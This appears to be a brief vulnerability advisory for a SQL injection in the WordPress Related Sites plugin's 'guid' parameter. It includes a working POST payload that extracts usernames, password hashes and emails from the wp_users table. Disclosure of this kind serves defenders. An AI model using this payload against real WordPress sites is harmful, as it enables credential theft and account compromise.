WordPress Related Sites Plugin 'guid' Parameter SQL Injection Vulnerability

WordPress Related Sites Plugin 'guid' Parameter SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example data is available:

POST: guid = 0', (select concat_ws(0x3a,user_login,user_pass,user_nicename,user_email) from wp_users where ID>0 and user_status=0 limit 1 ) );--
POST: click = .
HTTP_REFERER =